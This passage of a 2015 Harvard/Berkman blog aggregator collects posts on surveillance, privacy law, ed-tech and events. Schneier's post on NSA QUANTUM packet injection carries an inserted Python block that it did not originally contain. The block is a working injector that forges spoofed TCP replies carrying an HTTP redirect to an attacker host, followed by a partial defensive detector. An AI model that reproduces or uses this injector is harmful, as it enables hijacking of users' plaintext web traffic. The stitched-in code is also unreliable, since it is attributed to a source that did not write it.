I can’t prevent the spying entirely, and don’t want to when I’m getting something of high enough value in return. But I use a number of tools to keep the spying to a minimum. They include the permission settings in my mobile phone, and browser plugins that block (at least some of) the tracking. Students in my digital media literacy course are reading about ways to deter the invasion, and I hope they’ll take advantage of them.

People generally are becoming more aware of what we might call unintended data/media creation. That’s a good thing, and perhaps it’ll lead to broader countermeasures.



by Dan Gillmor at April 28, 2015 10:08 PM

Bruce Schneier
Shaking Someone Down for His Password

A drug dealer claims that the police leaned him over an 18th floor balcony and threatened to kill him if he didn't give up his password. One of the policemen involved corroborates this story.

This is what's known as "rubber-hose cryptanalysis," well-described in this xkcd cartoon.

by Bruce Schneier at April 28, 2015 05:50 PM

Berkman Center front page
Intellectual Privacy


with author Neil Richards


Come see @neilmrichards explain how privacy and free expression are essential to each other as he talks about his new book Intellectual Privacy.

Parent Event

Berkman Luncheon Series

Event Date

Apr 28 2015 12:00pm to Apr 28 2015 12:00pm

Tuesday, April 28, 2015 at 12:00 pm

Why is it bad when the government or companies monitor our reading or web-surfing? We have intuitions that this kind of surveillance is bad, but have failed to explain why digital monitoring in an age of terror and innovation is really a problem. In Intellectual Privacy, Neil Richards offers a new way of thinking about monitoring of our thinking, reading, and communications, one that ensures that our ideas and values keep pace with our technologies.

Although we often think of privacy and free speech as being in conflict, Richards shows how privacy and free speech are often essential to each other. He explains the importance of 'intellectual privacy,' protection from surveillance or interference when we are engaged in the processes of generating ideas - thinking, reading, and speaking with confidantes before our ideas are ready for public consumption. In our digital age, in which we increasingly communicate, read, and think with the help of technologies that track us, increased protection for intellectual privacy has become an imperative.

A timely and provocative book on a subject that affects us all, Intellectual Privacy will radically reshape the debate about privacy and free speech in our digital age.

About Neil

Neil Richards is an internationally-recognized expert in privacy law, information law, and freedom of expression. He is a professor of law at Washington University School of Law, an affiliate scholar with the Stanford Center for Internet and Society, a member of the Advisory Board of the Future of Privacy Forum, and a consultant and expert in privacy cases. He graduated in 1997 with degrees in law and history from the University of Virginia, and served as a law clerk to Chief Justice William H. Rehnquist.

Professor Richards is the author of Intellectual Privacy (Oxford Press 2015). His many writings on privacy and civil liberties have appeared in many academic journals including the Harvard Law Review, the Columbia Law Review, the Virginia Law Review, and the California Law Review. He has written for a more general audience in Time, Slate, Wired, Forbes, the Boston Review, and the Chronicle of Higher Education.

Professor Richards regularly speaks about privacy, technology, and civil liberties throughout the United States and Europe, and also appears frequently in the media. At Washington University, he teaches courses on privacy, free speech, and constitutional law, and is a past winner of the Washington University School of Law's Professor of the Year award. He was born in England, educated in the United States, and lives with his family in St. Louis. He is an avid cyclist and a lifelong supporter of Liverpool Football Club.

Twitter: @neilmrichards



by candersen at April 28, 2015 01:09 PM

Bruce Schneier
Nice Essay on Security Snake Oil

This is good:

Just as "data" is being sold as "intelligence", a lot of security technologies are being sold as "security solutions" rather than what they for the most part are, namely very narrowly focused appliances that at best can be part of your broader security effort.

Too many of these appliances unfortunately do not easily integrate with other appliances or with the rest of your security portfolio, or with your policies and procedures. Instead, they are created to work and be operated as completely stand-alone devices. This really is not what we need. To quote Alex Stamos, we need platforms. Reusable platforms that easily integrate with whatever else we decide to put into our security effort.

Slashdot thread.

by Bruce Schneier at April 28, 2015 11:21 AM

Center for Research on Computation and Society (Harvard SEAS)
Babis Tsourakakis' tutorial proposal accepted to KDD 2015
April 27, 2015

Babis Tsourakakis' tutorial proposal has been accepted to ACM SIGKDD Conference on Knowledge Discovery and Data Mining. KDD 2015 is a premier conference that brings together researchers and practitioners from data mining, knowledge discovery, data analytics, and big data. KDD 2015 will be the first Australian edition of KDD, and is its second time in the Asia Pacific region.

by kmavon at April 28, 2015 01:39 AM

April 27, 2015

Jeffrey Young
Wearable Teaching? College to Experiment With Apple Watch as Learning Tool

This post first appeared at

Even before the Apple Watch was released, professors and pundits began speculating on whether it and other wearable devices might play a role in college classrooms. On Monday researchers at Pennsylvania State University’s main campus announced that they would be among the first to test the device’s usefulness in the classroom.

The experiment will begin this summer, with eight Apple Watches the university purchased for the project. Penn State plans to expand the research to more students in the fall. We caught up with Kyle Bowen, director of education-technology services at Penn State, to hear more about the project, and his thoughts on the possible role of wearables in teaching and learning. Following is an edited version of the conversation.

Q. I understand a professor there will be experimenting with Apple Watch to measure student learning this fall. Can you briefly describe that project?

A. What we’re looking at in this particular research is how can we use wearable technologies like the Apple Watch to help students think about and reflect about how they learn. We know what the hallmarks are of engaged students: There are years of research that help us understand what an engaged student is and what they look like. But one of the challenges you have is how do you capture those types of activities in a Fitbit-like way — something that is very simple and easy to interact with, to think about reflectively how it is that you’re learning. We’re looking at the Apple Watch as a reflective tool to capture how the students are reacting with their classmates, how they’ve been interactive with their material, how they’re learning and using that to self-inform the student in a number of different ways.

Q. Can you paint a picture of what that will look like for one of the students in this experiment?

A. How it works is, the student will wear the watch and on kind of a random interval the student will get sampled from a series of questions, and will receive a question like, “Have you studied with a classmate recently?” Or, “How much have you spent studying recently?” Or, “Have you applied something recently from another course to your current class?” So that will be the first step … capturing that piece of information. And we’d have a series of questions like that throughout the day, and when the student would get that question, they could kind of respond to it, or dismiss it and answer it another time. Additionally, the student could … provide a voice feedback, so they could talk to us into the watch about how they’ve been studying. And we can convert that and actually do some textual analysis after the fact.

Q. Why not just use a smartphone? What additional benefit do you get out of the watch?

A. The way I like to explain it is, the watch can exist with the student at the moment of learning, but do it in a way that it’s not between them and whatever’s being taught. So it sits on their wrist and it’s with you, but it’s not in your hand. It’s not something you necessarily have to think about and pull out of your pocket and do. That’s the idea … that it becomes virtually transparent as part of that process. So the question is, Would you receive more interaction as a result of that on a regular basis, and does that lead to better reflection on how you’ve been learning?

Q. In the past Apple has encouraged pilot projects in education for their new devices. Is Apple supporting this project in any way?

A. We’ve been discussing this off and on with Apple. We’ve had some of our developers out to a developers’ event centered on the watch earlier this week. And that’s sort of the level of engagement at this point.

Q. People often seem interested in how new Apple products might be used in the classroom. It happened with iPads and iPhones before that. What is your prediction. Do you see Apple Watches as becoming a classroom device in some way?

A. In the classroom the early opportunity is going to be as a teaching device. It provides a lot of the same types of functionality that we saw with smartphones and tablets. However, the advantage now is that for the faculty member they can truly be hands-free. So they can do things like control their presentation, but they no longer have to stand at a lectern to do it or even have a clicker anymore [to advance the slides]. They could just use the watch to interact with their presentation material. A lot of these small little apps that we’ve seen to, say, identify a random student — these types of small tools to automate the classroom experience can be put onto a watch, and no longer do I have to think about having to stand at the lectern because I want to use my hands or carry around a tablet. Now I just have a device on my wrist, and I can interact with it.

Q. When the Apple Watch was first announced, a professor put out a parody of how this kind of wearable could be overkill in the academic context, including noting that one feature could be to send an electric shock to the user’s wrist if an academic paper gets rejected to remind you to work harder next time. What do you say to professors who feel that this is too much bells and whistles for the classroom?

A. It very well may be. It’s just like everything else. It’s the point at which it becomes useful. Wearables like the Apple Watch have yet to find their killer app, the thing that everybody can all get excited about to say, This is why you would have it as part of the learning experience. So this is to understand it. We can begin to see what the opportunities are.

Q. What about access? To use the Apple Watch requires owning an iPhone and this expensive new device. Could this further a divide between tech haves and have-nots in higher education?

A. It’s certainly something to keep in mind, so that’s why we should keep in mind what are the value points? That’s why we’re starting this exploration at a small level, and comparing this with other devices that are more common. To find out: These are the kinds of advantages that make it more worthwhile or less worthwhile. To enter in with a large amount of skepticism but thinking, What are the opportunities?

Q. So are you wearing an Apple Watch now?

A. Yeah. I did not call you on it, though. I just got it this morning, and I’ve just been playing around with it. It’s really neat. If you’ve ever watched Knight Rider as a kid, I can’t help but feel like that. You can text through it; you can call through it, which was kind of unexpected. The way they engineered the interaction on the device is really elegant. It’s surprisingly easy to interact with. For first-generation technology I’m impressed by it. But it doesn’t have its killer app yet.

by jryoung at April 27, 2015 08:40 PM

Berkman Center front page
Berkman Buzz: April 27, 2015


Wikipedia's success, Ethiopia's crackdown, algorithm questions, the busy Cyberlaw Clinic, and more... in this week's Buzz.


The Berkman Buzz is a weekly collection of work, conversations, and news from around the Berkman community.


Jonathan Zittrain explores the success of Wikipedia


Harvard University's Jonathan Zittrain explores the amazing success of Wikipedia, a concept that "works really well in practice, just not in theory." Not only is it a remarkable and unique model of a self-regulating entity, its governors and stakeholders are both members of the public at large. Zittrain examines whether Wikipedia is something that can be sustained long term, whether it will need to adapt or grow in the future, and whether such adaptations and growth could potentially scuttle the entire operation. Finally, Zittrain offers up a suggestion for how to apply Wikipedia in an academic setting: Why not turn Wikipedia articles into long-term research projects?


From the intro to his Big Think video, "Why Wikipedia Works Really Well in Practice, Just Not in Theory, with Jonathan Zittrain"
About Jonathan | @zittrain

Cyberlaw Clinic files amicus briefs on free speech and location privacy


On Tuesday, the Cyberlaw Clinic filed an amicus brief in the Supreme Judicial Court of Massachusetts on behalf of the New England First Amendment Coalition, Boston Globe Media Partners, LLC (owners of the Boston Globe), Hearst Television, Inc. (owners of WCVB-TV Channel 5 in Boston), the Massachusetts Newspaper Publishers Association, the New England Newspaper and Press Association, Inc., and the New England Society of Newspaper Editors in Commonwealth v. Lucas, SJC-11830. The case was brought under the Massachusetts false campaign speech law, M.G.L. ch. 56 § 42 ("Section 42"). The defendant in the case, a treasurer with a political action committee that sent a mailer in the 2014 state election, challenged the constitutionality of the statute under the First Amendment and Article 16 of the Massachusetts Declaration of Rights.


The Cyberlaw Clinic filed an amicus brief this week in the Supreme Judicial Court of Massachusetts on behalf of the American Civil Liberties Union of Massachusetts (ACLUM) and the Electronic Frontier Foundation (EFF) in Commonwealth v. Estabrook, SJC-11833. The case concerns location privacy and cell phone technology - specifically, whether law enforcement can gather a large amount of cell phone location information if it only plans to use a small fraction of that information in a prosecution.


From the blog posts, "Clinic Files Amicus Brief on Free Speech Issue in Massachusetts" and "Clinic Files Amicus Brief in Mass SJC on Location Privacy"
About the Cyberlaw Clinic | @cyberlawclinic

Zeynep Tufekci speaks about the challenges of online social change


These days, all it takes to start a protest is a cell phone, says professor Zeynep Tufekci. But does the ease of social media impede social movements from making big gains?

"Today's protests have become a bit like climbing Mt. Everest with the help of 60 Sherpas, and the Internet is our Sherpa." - Zeynep Tufekci


From her TED talk featured on NPR's TED Radio Hour, "Online social change: easy to win, hard to organize"
About Zeynep | @zeynep

Ellery Roberts Biddle considers Ethiopia's crackdown on journalists and dissent


Ethiopia currently ranks fourth on a list of the world's most censored countries, according to a Committee to Protect Journalists report released this week.

In the run-up to elections in May, the report found that the government had filed lawsuits accusing six publications of "encouraging terrorism," forcing 16 journalists to flee into exile, while the sole internet provider, Ethio Telecom, stands accused of routinely suspending critical news websites.


From her article in the Guardian, "One year on, jailed Ethiopian bloggers are still awaiting trial"
About Ellery | @ellerybiddle

New Harvard Law case study examines societal questions raised by algorithms


June 2014 saw a media uproar about Facebook's emotional contagion study, published in the Proceedings of the National Academy of Sciences. In conjunction with researchers at Cornell, Facebook designed an experiment which altered the Facebook News Feed to explore if emotions can spread through Facebook. These feeds, the primary activity and content list on Facebook, are populated according to a proprietary algorithm. In the experiment, the algorithms for a random subset of users were manipulated to display either proportionately more negative emotional content or proportionately more emotional content; a control group saw content according to the current algorithm.

This study met vocal opposition not solely for manipulating the moods of Facebook users, but also because users neither volunteered nor opted in to such research, and were not informed of their participation in the study. This study is a motivating example of the moral, legal, and technical questions raised when algorithms permeate society.


From the Harvard Law case study, co-authored by Jonathan Zittrain, "Algorithmic Allegories (version 1.0)"
About Jonathan | @zittrain

Alison Head interviews Dan Rothstein of the Right Question Institute about learning to ask questions


Imagine students in courses that encourage dialogue, the exchange of ideas, and, yes, metacognition. The act of engaging with others, of seeking different perspectives, of tapping other resources can become part of their modus operandi. If we want to encourage this, we can't expect that it will happen by chance or osmosis. Thousands of students sitting alongside of each other, taking notes, and answering questions, is not the same as students engaged in thinking with their peers. There is a need for a pedagogical vision that deliberately builds a community engaged in intellectual exchange.


From the "Smart Talk" interview, "Dan Rothstein: The necessity of asking questions"
About Alison | About Project Information Literacy

Chris Bavitz explains what's great about the Berkman Center


The Berkman Center occupies a unique position at the intersection of scholarship, business, law, and policy. It is renowned for its convening power and its ability to solicit input from, share information with, and facilitate communications among researchers, companies, government representatives, and public interest advocacy organizations about the subjects of the Center's work....

This confluence of research, teaching, advocacy, and technical development activities in a single institution is unique. That the Center engages in these activities while maintaining such an energetic community - deeply engaged in near-constant dialogue about law and technology business, norms, and policy - is extraordinary.


From his HLS Admissions blog post, "Technology, Innovation, and Entrepreneurship at Harvard: Interdisciplinarity and Impact at The Berkman Center for Internet and Society"
About Chris | @cbavitz

Nepal Earthquake: People Around the World Scramble Online to Find Loved Ones


An overwhelmed Nepali government has declared a state of emergency appealing to the international community following a massive 7.8 earthquake, which struck close to noon on April 25, between Nepal's key cities of Kathmandu and Pokhara, resulting in more than 1,800 deaths.

In the midst of this crisis, people are using tools like Google Person Finder and Facebook Safety Check to find loved ones. Google Person Finder launched in 2010 in response to the earthquake in Haiti and helps people find each other in the aftermath of a disaster, by downloading or uploading data from the site.


From Global Voices | @globalvoices

More Berkman in the News

Manage subscription preferences

by gweber at April 27, 2015 07:32 PM

Berkman Center front page
The Arab Networked Public Sphere: Social Mobilization Post-Revolutions


With special guests, Lina Attalah, Rob Faris (moderator), Fares Mabrouk, Dalia Othman and Nagla Rizk


Join us for a round-table discussion on the networked public sphere and social mobilization post-revolutions in the Arab world.

Event Date

Apr 27 2015 5:00pm to Apr 27 2015 6:30pm

Monday, April 27, 2015 5:00 pm - 6:30 pm
Harvard Law School campus
Wasserstein Hall, Milstein East C (second floor)

Join us for a round-table discussion on the networked public sphere and social mobilization post-revolutions in the Arab world. Researchers working with Harvard’s Berkman Center for Internet & Society, the American University in Cairo’s Access to Knowledge for Development Center, Innova Tunisia and the Arab Policy Institute will discuss current research conducted on the evolution of the networked public sphere in Egypt and Tunisia.

The networked public sphere has emerged as an influential medium for sharing news, disseminating information, and mediating collective action. Many have pointed to the impact of digital media on politics and public affairs, particularly in promoting and coordinating popular protests. Digitally mediated collective action continues to play a prominent role in the political landscape in Egypt and Tunisia. Nevertheless, rigorous assessments of the networked public sphere’s impact, modalities, and relationship to collective action offline are still rare.

In this session, we will present and discuss research that focuses on tracking and analyzing the socio-political topics in online content and their interplay with offline networks based on fieldwork research in Egypt and Tunisia.

This research is part of a joint effort by the Berkman Center, the American University in Cairo’s Access to Knowledge for Development Center (A2K4D), Innova Tunisia and the Arab Policy Institute.

Lina Attalah is the chief editor of Mada Masr, a Cairo-based news website. She is also a research fellow with the Access to Knowledge for Development Center.

Rob Faris (moderator) is the Research Director of the Berkman Center for Internet and Society at Harvard University.

Fares Mabrouk is the Director of the Arab Policy Institute, a Tunis-based think tank. He also leads Yunus Social Business (YSB) global acceleration programs.

Dalia Othman is a Berkman Fellow and Visiting Scholar at MIT's Center for Civic Media.

Nagla Rizk is a professor of economics and founding director of the Access to Knowledge for Development Center at the American University in Cairo.

Note: Jazem Halioui, CEO of Innova Tunisia and an entrepreneur with eighteen years of experience in bootstrapping and managing companies in Tunisia and France, was originally scheduled to participate, but unfortunately will not be able to attend.

Event Hashtag: #ArabNPS


by candersen at April 27, 2015 01:32 PM

David Weinberger
My losing bingo card

At our daughter’s baby shower — which was awesome — we played Baby Shower Bingo. You fill in a bingo card with items, and if during the opening of the gifts any of those items have been given, you mark it on your card. First with five in a row wins (In this case they won a Toblerone bar.)

Here’s my losing card:

baby shower bingo card

The post My losing bingo card appeared first on Joho the Blog.

by davidw at April 27, 2015 12:00 AM

April 26, 2015

metaLAB (at) Harvard
The ghosts of poets’ voices walk the yard

I’ve long been a fan of Halsey Burgund, a sound artist and musician who works with the human voice in both compositions and place-based installations. So I’ve been excited to work with Halsey these last few weeks, in conjunction with the Woodberry Poetry Room, to develop a locative experience on poetry for Harvard’s upcoming LitFest. The resulting project, re~verse (for iOS devices), is a portal to a participatory, location-based sound installation in which fragments of recorded poetry from Harvard’s collections—the voices of renowned poets—crowd together at the gates of Harvard Yard. Like tourists, students, and the many passers-by who make up the migrant denizens of campus, they cluster at the gates before dispersing, chorusing with music and one another across stanzas and centuries. From gate to gate, they combine with the voices of users of the app, who are invited to contribute to a growing, unfolding work of art with responses, recitations, and reveries.

The app assembles more than a thousand pieces of audio, samples taken from the extraordinary audio archive of poetry readings gathered in the Woodberry collection (see the map below, which shows Halsey’s placement of audio files for the project, and gives a sense of the magnitude of the media in play). And yet Halsey’s app allows this density of archival sound to reach listeners intimately and evocatively, as voices whispering quietly, pacing alongside, inviting them to venture their own reflections.


While re~verse is available globally from the App Store, it ties its sound media ineluctably to site—in this case, to the gates of the Yard—so to experience it fully, you’ll need to install the app on your iOS device, plug in your headphones, and wander Harvard’s Cambridge campus. This is a poetic encounter with place.

This Tuesday night, you can join us in Barker Center’s Thompson Room for the opening celebration of re~verse. During this event, those dynamic and vital voices will fill the Thompson Room in Barker Center as participants immerse themselves in, contribute to, and stand among a growing, unfolding work (or working) of art. We’ll invite participants to install the app or borrow a device to wander across Quincy Street, where the books stand open and the gates unbarred, to chorus with poets.

Get re~verse (for iOS)

by Matthew Battles at April 26, 2015 02:53 PM

Justin Reich
Looking at Class Sets of Work with
Exploring student thinking and problem solving with resources from, one of the gems of the Math TwittoBlogoSphere. #MTBoS

by Justin Reich at April 26, 2015 12:45 AM

April 25, 2015

David Weinberger
Our new plummy acting

I have to say that I’m enjoying our new hammy acting style. But hammy isn’t the right word for it, since it implies a lack of craft. So I’ll call it plummy. (The fact that I’m a kosher vegetarian has nothing to do with this.) Our new plummy actors are fully in control of what they’re doing. They’re on purpose pushing it a little further than realness, knowing that we know that they’re doing so.

Leo Dicaprio in What’s Eating Gilbert Grape? is not hammy or plummy.

Leo in Wolf of Wall Street is plummy.

Had he gone for a Brando-like realism, Wolf would have been as depressing as businesspeople-are-shallow movies like 1959’s What Makes Sammy Run?

Every character in American Horror Story is plummy. Most of the actors on Justified are plummy. Well, the male actors. They get to have way more fun than almost all the women. (The exception: Margo Martindale who played Megs, the Big Bad in 2011. And guess what? She won an Emmy for it.)

Everyone on Fargo, both the TV show and the movie.

Everyone on Veep, which has gotten ferociously funny this season.

Tony and the Henchmen on The Sopranos. Not so much Carmela or Dr. Melfi, although Nancy Marchand‘s Mom the Destroyer certainly counts.

I’m not sure that Breaking Bad is a great example of this, but Better Call Saul is…again, for the men more than the women, with the exception of Julie Ann Emery‘s Betsy Kettleman.

I’m not saying this is an unprecedented style of acting. In some ways it’s similar to the old days when stars were visible through the roles they played: You could see Cary Grant behind the lines he suavely delivered, and you could see Marilyn Monroe through her bombshell comedienne roles. Or at least you thought you could.

But the current style of acting is different. These actors are as invisible in their roles as Brando’s generation was. But what they’re making of themselves on screen isn’t intended to be mistaken for real life captured by well-placed hidden cameras. They are clearly playing roles. They’re just playing the hell out of them.

So why the men more than the women? As everyone who has watched TV in the past five years has pointed out, the new great series have been dominated by stories of men struggling with their flaws. The women too often are there to “ground” the characters around them. They are often phenomenal actors — Edie Falco? Get out of town! — but are just not allowed to push beyond the natural. I’m sure it’s all just a coincidence though.


Mad Men isn’t on this list because I think the acting aims for naturalism, perhaps because we already see the distance between the roles people play within their world and who they might be if they were less constrained by the 1950s and 1960s social norms.

The post Our new plummy acting appeared first on Joho the Blog.

by davidw at April 25, 2015 08:39 PM

April 24, 2015

Bruce Schneier
Friday Squid Blogging: The Unique Reproductive Habits of the Vampire Squid


While most female squid and octopuses have just one reproductive cycle before they die, vampire squid go through dozens of egg-making cycles in their lifetimes, scientists have found.

As usual, you can also use this squid post to talk about the security stories in the news that I haven't covered.

by Bruce Schneier at April 24, 2015 09:43 PM

Cyberlaw Clinic - blog
Clinic Files Amicus Brief in Mass SJC on Location Privacy

The Cyberlaw Clinic filed an amicus brief (PDF) this week in the Supreme Judicial Court of Massachusetts on behalf of the American Civil Liberties Union of Massachusetts (ACLUM) and the Electronic Frontier Foundation (EFF) in Commonwealth v. Estabrook, SJC-11833. The case concerns location privacy and cell phone technology — specifically, whether law enforcement can gather a large amount of cell phone location information if it only plans to use a small fraction of that information in a prosecution. This is the third brief the Clinic has filed on location privacy issues in Massachusetts, including briefs for EFF in Commonwealth v. Augustine and Commonwealth v. Rousseau in 2013.

Cellular service providers must know where their subscribers are at any given time to provide them with service. Providers therefore collect vast quantities of location information, tracking the movements of customers wherever they go. Last year, in Augustine, 467 Mass. 230 (2014), the Supreme Judicial Court ruled that, in general, the police must get a search warrant to obtain location information from a cellular service provider. The ruling left open the possibility, however, that the police might be able to obtain a “brief period” of location information without a warrant but, instead, with a court order that is considerably easier to obtain.

This latest brief argues that Augustine requires police to get a warrant to obtain location information even if they only plan to use a small amount. It urges the SJC to establish a blanket warrant requirement that applies whenever police seek cellphone location data. As the brief notes, considering the growing volume and accuracy of such data, and the confusion that the Augustine exception has created in the lower courts, a blanket warrant requirement would provide much-needed clarity to police, prosecutors, and the public. Such a rule would align Massachusetts with the dozen other states that have imposed blanket warrant requirements for cellphone location data, without any apparent ill effects on the ability of the police to investigate crimes.

The case is scheduled for argument on Thursday, May 7th, at the John Adams Courthouse in Boston. Special thanks go to HLS Cyberlaw Clinic students Abigail Colella (’16), Sandra Hanian (’15), and Travis West (’16), who worked closely with Vivek Krishnamurthy, Andy Sellars, and the amici, to prepare and file the brief.

by Clinic Staff at April 24, 2015 07:40 PM

Bruce Schneier
Signed Copies of Data and Goliath

You can now order signed copies of Data and Goliath from my website.

by Bruce Schneier at April 24, 2015 07:12 PM

The Further Democratization of QUANTUM

From my book Data and Goliath:

...when I was working with the Guardian on the Snowden documents, the one top-secret program the NSA desperately did not want us to expose was QUANTUM. This is the NSA's program for what is called packet injection -- basically, a technology that allows the agency to hack into computers. Turns out, though, that the NSA was not alone in its use of this technology. The Chinese government uses packet injection to attack computers. The cyberweapons manufacturer Hacking Team sells packet injection technology to any government willing to pay for it. Criminals use it. And there are hacker tools that give the capability to individuals as well. All of these existed before I wrote about QUANTUM. By using its knowledge to attack others rather than to build up the Internet's defenses, the NSA has worked to ensure that anyone can use packet injection to hack into computers.

And that's true. China's Great Cannon uses QUANTUM. The ability to inject packets into the backbone is a powerful attack technology, and one that is increasingly being used by different attackers.

I continued:

Even when technologies are developed inside the NSA, they don't remain exclusive for long. Today's top-secret programs become tomorrow's PhD theses and the next day's hacker tools.

I could have continued with "and the next day's homework assignment," because Michalis Polychronakis at Stony Brook University has just assigned building a rudimentary QUANTUM tool as a homework assignment. It's basically sniff, regexp match, swap sip/sport/dip/dport/syn/ack, set ack and push flags, and add the payload to create the malicious reply. Shouldn't take more than a few hours to get it working. Of course, it would take a lot more to make it as sophisticated and robust as what the NSA and China have at their disposal, but the moral is that the tool is now in the hands of anyone who wants it. We need to make the Internet secure against this kind of attack instead of pretending that only the "good guys" can use it effectively.
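The recipe in the paragraph above, worked through in code. This is an added example written for this page; it is not Schneier's text, not the Stony Brook assignment, and not any real injection tool. It parses a sniffed IPv4/TCP segment, regex-matches the payload, and builds the spoofed reply: addresses and ports swapped, SEQ taken from the victim's ACK, ACK set to the victim's SEQ plus the bytes it sent, PSH|ACK flags, an attacker payload, and valid IP and TCP checksums so a stack will accept it. The client request, the addresses (RFC 5737 documentation space), the regex, the attacker hostname and the forged 302 response are all constructed for the example. The block only produces bytes; putting them on the wire needs a raw socket and a vantage point on the path, which is deliberately left out.

```python
"""Minimal QUANTUM-style packet injection (constructed example, standard library only).

Given a sniffed IPv4/TCP segment whose payload matches a regex, build the spoofed
reply a man-on-the-side attacker would race onto the wire ahead of the real server.
"""
import re
import socket
import struct

TCP_FIN, TCP_SYN, TCP_RST, TCP_PSH, TCP_ACK = 0x01, 0x02, 0x04, 0x08, 0x10


def checksum(data: bytes) -> int:
    """RFC 1071 one's-complement sum over 16-bit words (returns 0 for a valid packet)."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_ipv4_tcp(src, dst, sport, dport, seq, ack, flags, payload, ttl=64):
    """Serialise IPv4 header + 20-byte TCP header + payload with correct checksums."""
    src_b, dst_b = socket.inet_aton(src), socket.inet_aton(dst)
    tcp_len = 20 + len(payload)
    # TCP header with a zero checksum, then checksum over pseudo-header + segment.
    tcp = struct.pack("!HHIIBBHHH", sport, dport, seq, ack, 5 << 4, flags, 65535, 0, 0)
    pseudo = src_b + dst_b + struct.pack("!BBH", 0, socket.IPPROTO_TCP, tcp_len)
    tcp = tcp[:16] + struct.pack("!H", checksum(pseudo + tcp + payload)) + tcp[18:]
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + tcp_len, 0, 0, ttl,
                     socket.IPPROTO_TCP, 0, src_b, dst_b)
    ip = ip[:10] + struct.pack("!H", checksum(ip)) + ip[12:]
    return ip + tcp + payload


def parse_ipv4_tcp(pkt: bytes) -> dict:
    """Decode the fields the injector needs from a raw IPv4/TCP packet."""
    ihl = (pkt[0] & 0x0F) * 4
    total_len = struct.unpack("!H", pkt[2:4])[0]
    tcp = pkt[ihl:total_len]
    sport, dport, seq, ack, off_res, flags = struct.unpack("!HHIIBB", tcp[:14])
    return {"src": socket.inet_ntoa(pkt[12:16]), "dst": socket.inet_ntoa(pkt[16:20]),
            "sport": sport, "dport": dport, "seq": seq, "ack": ack, "flags": flags,
            "payload": tcp[(off_res >> 4) * 4:]}


def checksums_ok(pkt: bytes) -> bool:
    """True if both the IPv4 and TCP checksums verify on the wire bytes."""
    ihl = (pkt[0] & 0x0F) * 4
    seg = pkt[ihl:struct.unpack("!H", pkt[2:4])[0]]
    pseudo = pkt[12:20] + struct.pack("!BBH", 0, socket.IPPROTO_TCP, len(seg))
    return checksum(pkt[:ihl]) == 0 and checksum(pseudo + seg) == 0


def craft_injection(captured: bytes, pattern: bytes, inject: bytes):
    """Return the spoofed reply for a matching data segment, or None if it does not match."""
    p = parse_ipv4_tcp(captured)
    # Only data segments on an established connection carry anything to match on.
    if p["flags"] & (TCP_SYN | TCP_RST) or not p["payload"]:
        return None
    if not re.search(pattern, p["payload"]):
        return None
    # The forged segment must look like the server's next in-order data: our SEQ is
    # what the client expects next (its ACK) and we ACK everything it has sent so far.
    return build_ipv4_tcp(
        src=p["dst"], dst=p["src"], sport=p["dport"], dport=p["sport"],
        seq=p["ack"], ack=(p["seq"] + len(p["payload"])) & 0xFFFFFFFF,
        flags=TCP_PSH | TCP_ACK, payload=inject)


# Constructed sample: a client at 10.0.0.5 fetching a page over plaintext HTTP from a
# server at 203.0.113.10 (documentation address); SEQ/ACK values are made up.
CLIENT_REQUEST = build_ipv4_tcp(
    "10.0.0.5", "203.0.113.10", 51234, 80, seq=1000, ack=5000,
    flags=TCP_PSH | TCP_ACK,
    payload=b"GET /index.html HTTP/1.1\r\nHost: example.com\r\n\r\n")

# Hypothetical attacker payload: redirect the browser to an attacker-controlled host.
FAKE_RESPONSE = (b"HTTP/1.1 302 Found\r\nLocation: http://attacker.invalid/\r\n"
                 b"Content-Length: 0\r\n\r\n")

if __name__ == "__main__":
    forged = craft_injection(CLIENT_REQUEST, rb"^GET /\S* HTTP/1\.", FAKE_RESPONSE)
    print(parse_ipv4_tcp(forged))
```

The forged segment is only accepted if it reaches the client before the genuine response and lands inside the client's receive window, which is why the real deployments sit at backbone vantage points and why this is a man-on-the-side rather than a man-in-the-middle attack: the attacker never has to block the real reply, only beat it. It also only works because the HTTP exchange is plaintext. The same bytes injected into a TLS connection would fail record authentication and the client would tear the connection down, which is exactly the end-to-end encryption argument that follows.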

End-to-end encryption is the solution. Nicholas Weaver wrote:

The only self-defense from all of the above is universal encryption. Universal encryption is difficult and expensive, but unfortunately necessary.

Encryption doesn't just keep our traffic safe from eavesdroppers; it protects us from attack. DNSSEC validation protects DNS from tampering, while SSL armors both email and web traffic.

There are many engineering and logistic difficulties involved in encrypting all traffic on the internet, but it's one we must overcome if we are to defend ourselves from the entities that have weaponized the backbone.


And this is true in general. We have one network in the world today. Either we build our communications infrastructure for surveillance, or we build it for security. Either everyone gets to spy, or no one gets to spy. That's our choice, with the Internet, with cell phone networks, with everything.
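The injector described above (a spoofed reply built from the swapped address/port tuple and the expected sequence number) races the genuine server's reply, so the client usually ends up with two segments claiming the same sequence number but carrying different bytes. The following is an added example, not code from the post or from any real tool, of a defender-side detector for that collision run over a constructed capture; the addresses, ports, payloads and the `ttl_slack` threshold are assumptions.

```python
"""
Defender-side detector for race-injected TCP replies.

A QUANTUM-style injector sniffs a request, swaps sip/sport/dip/dport and
the seq/ack numbers, sets ACK and PSH, and sends its own payload as the
"reply". The real server still answers, so the client typically receives
two segments for one (flow, seq) with different payloads. This detector
looks for exactly that collision in a list of captured segments.

Example code added to this page; not from the original post or any real
detector. All segment records below are constructed; no live capture.
"""
from dataclasses import dataclass
from typing import Dict, List, Tuple

FlowKey = Tuple[str, int, str, int, int]  # (src, sport, dst, dport, seq)


@dataclass(frozen=True)
class Segment:
    src: str
    sport: int
    dst: str
    dport: int
    seq: int
    ack: bool      # recorded for context: an injected reply sets ACK ...
    psh: bool      # ... and PSH, exactly like a genuine data reply would
    ttl: int
    payload: bytes


@dataclass(frozen=True)
class Alert:
    key: FlowKey
    reasons: Tuple[str, ...]
    first: Segment
    second: Segment


def flow_key(seg: Segment) -> FlowKey:
    return (seg.src, seg.sport, seg.dst, seg.dport, seg.seq)


def detect_injection(segments: List[Segment], ttl_slack: int = 3) -> List[Alert]:
    """Flag a (flow, seq) that is answered with two different payloads.

    A retransmission repeats bytes already seen and is ignored. A new,
    different payload for a sequence number already answered means two
    senders replied to the same request, the signature of a race-based
    injector. A TTL gap larger than ttl_slack (an assumed threshold) is
    attached as a secondary reason: a reply forged from a mid-path vantage
    point has crossed a different number of hops than the server's reply.
    """
    seen: Dict[FlowKey, Dict[bytes, Segment]] = {}
    alerts: List[Alert] = []
    for seg in segments:
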